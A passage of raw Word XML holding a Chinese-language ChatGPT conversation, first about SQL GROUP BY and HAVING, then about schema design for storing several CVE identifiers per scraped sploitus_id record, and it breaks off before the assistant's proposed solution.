      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合聚合函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GROUP BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D090569" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2146C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA49AD4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT column1, COUNT(*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED497C0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FROM table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE6754" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>GROUP BY column1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F05C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796CFA9B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的语句会按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> column1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据进行分组，并且对每组数据计数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6F44F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25675909" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    GROUP BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HAVING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤分组：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF7C0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD6A0AB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE7E76" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT column1, COUNT(*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A65381" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FROM table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE3F26" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>GROUP BY column1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042972FE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>HAVING COUNT(*) &gt; 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D3A1D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731B3B15" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的语句会按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> column1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的数据进行分组，并且过滤出计数大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的分组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B67895" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="513CD1F5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，实际的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法可能会因为你使用的数据库系统（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）的不同而有所不同。如果你在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GROUP BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句时遇到任何问题，我建议你查阅你所使用的数据库系统的官方文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254F7826" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C122F7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我遇到了这么一个问题，给你简化场景描述一下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有个网站，有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">content sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个字段被我爬，我自己从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中匹配出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段，然后存到数据表中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cve content sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三个字段。这个过程中我设置了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是有个需求，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中匹配出多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须分开单独存储，不能黏合为一个字符串存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段，需要分开存储。我目前的想法，是取消</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设置，多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情况下，就分别单独存一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后其他数据就冗余一下。你对我的思路有什么看法，和好的建议吗？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306763C7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096BA17D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011EE3DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的思路是合理的，即将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为非唯一键，并且为每个单独的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新行。这样做可以方便你后期对数据进行统计和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918A2FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613116CE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种情况下，你实际上在实现一对多的关系：一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以对应多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这是数据库设计中常见的一种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344B4D7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDA6FB9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，你需要注意的是，这种方式会导致数据冗余，即同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被多次存储。虽然这种冗余对于存储空间来说可能不会成为问题（除非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据非常大），但可能会对数据的一致性产生影响。例如，如果你需要更新一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你需要更新所有具有该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD0151" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58287D08" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一种可能的解决方案是引入第三张表，来显式地表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的一对多关系。例如，你可以保持现有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表，并添加一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id_CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表，其中每行都包含一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的对应关系。这样，你可以避免数据冗余，但查询可能会变得更复杂。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24517872" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64866D67" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终的决定应根据你的具体需求和数据集大小来做。如果你的数据集不大，并且更新不频繁，你的当前思路是合理的。如果你的数据集很大或者需要频繁更新，可能需要考虑使用第三张表的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141FE6E8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA07A2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本来是为了使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，这样数据库自己就处理重复插入同一个数据的问题，不需要我还得写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句看这个数据存不存在。那如果采用取消</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、冗余存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的话，那你有什么好的建议吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3391E9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471A377" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1698BD9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取消</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的唯一键约束后，你将不能再使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> REPLACE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来自动处理重复项。然而，这并不意味着你需要手动执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句来检查每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否已存在。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句来插入新的记录，并忽略因重复而导致的错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAED80B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA31E0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个可能的解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC49C88" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B5F602" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
